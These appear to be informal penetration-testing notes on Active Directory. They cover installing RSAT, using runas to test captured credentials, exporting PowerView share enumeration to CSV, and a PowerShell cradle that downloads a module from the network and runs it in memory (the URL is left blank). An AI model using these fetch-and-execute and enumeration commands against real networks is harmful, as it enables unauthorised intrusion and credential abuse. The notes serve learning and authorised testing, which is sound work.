Installing Remote Server Administation Tools#

You can download it from powershell like this:

Enable-WindowsOptionalFeature -Online -FeatureName RSATClient-Roles-AD-Powershell

import-module activedirectory

If that doesnt work, you need to download it, just google Rmote Server ADministation tool WIndows 10, 8 or whatever. Download it. Install it. Restart the the computer.

Open up Control Panel / Turn Windows Features on and Off / Rmote Server ADministation Tools / Role Administation TOols / AD DS and AD LDS tools / Active directory module for windows powershell

Runas / Testing a user account#

Say to get access to creds from a user. Or just want to run a program in the context of another user. Kind of like SUDO put over the network, you can do:

runas /user:USERNAME@domain.local cmd.exe
runsas /user:domain.local\USERNAME

Export to CSV#

You can always pipe the return data to a CSV file, like this:

find-domainshare -CheckShareAccess | Export-Csv qwe.csv

Download module an inject into memory#

If you are using PowerView, remember to use the Dev-version, since it is correct with the documentation.

IEX (New-Object Net.WebClient).DownloadString('');